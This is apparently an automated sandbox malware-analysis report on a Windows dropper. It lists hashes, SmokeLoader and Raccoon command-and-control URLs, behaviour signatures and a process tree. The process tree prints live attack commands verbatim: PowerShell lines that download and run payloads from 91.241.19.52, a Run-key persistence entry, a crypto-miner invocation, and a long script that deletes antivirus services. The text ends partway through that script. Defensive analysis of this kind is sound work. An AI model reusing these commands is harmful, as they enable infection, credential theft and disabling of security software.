Analysis
-
max time kernel
143s -
max time network
157s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
11-08-2021 20:01
General
-
Target
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe
-
Size
207KB
-
MD5
4a24658b8b28d1512378d374676846dc
-
SHA1
1d326b774e7f11bcaffbdb4198db8cc47735e808
-
SHA256
d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a70270e30e666c9baa7d
-
SHA512
c762af1ea682cfa41bdb211a74cce91600da32ccace258e6dd0b2ed9eb02bad2d01922ef9ccc00a6b1c909d8fe7e3955ded408a0f643da75fcfbb805de4b6d3c
Malware Config
Extracted
http://91.241.19.52/Api/GetFile2
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
Extracted
raccoon
2ca2376c561d1af7f8b9e6f3256b06220a3db187
-
url4cnc
https://telete.in/johnyes13
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
-
url4cnc
https://telete.in/p1rosto100xx
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
Raccoon Stealer Payload 6 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 55 IoCs
-
Checks BIOS information in registry 2 TTPs 64 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Deletes itself 1 IoCs
-
Drops startup file 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 6 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 37 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 22 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 2 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 19 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"C:\Users\Admin\AppData\Local\Temp\d2802e029df61fb38639eeb7881aa6f5bd752409e6b2a.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\AEE3.exeC:\Users\Admin\AppData\Local\Temp\AEE3.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\B472.exeC:\Users\Admin\AppData\Local\Temp\B472.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-5EMF5.tmp\B472.tmp"C:\Users\Admin\AppData\Local\Temp\is-5EMF5.tmp\B472.tmp" /SL5="$B0058,4193427,831488,C:\Users\Admin\AppData\Local\Temp\B472.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\B472.exe"C:\Users\Admin\AppData\Local\Temp\B472.exe" /VERYSILENT3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-12HDI.tmp\B472.tmp"C:\Users\Admin\AppData\Local\Temp\is-12HDI.tmp\B472.tmp" /SL5="$E0052,4193427,831488,C:\Users\Admin\AppData\Local\Temp\B472.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\smss.exe"C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\smss.exe"8⤵
- Executes dropped EXE
-
C:\ProgramData\Systemd\HostData.exeNULL6⤵
- Executes dropped EXE
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
-
C:\Users\Admin\AppData\Local\Temp\BD9B.exeC:\Users\Admin\AppData\Local\Temp\BD9B.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\C1B3.exeC:\Users\Admin\AppData\Local\Temp\C1B3.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 8762⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 8842⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 9242⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 9042⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 9162⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 8762⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 7363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 7883⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 7683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 8003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 10083⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 10483⤵
- Program crash
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method3⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete 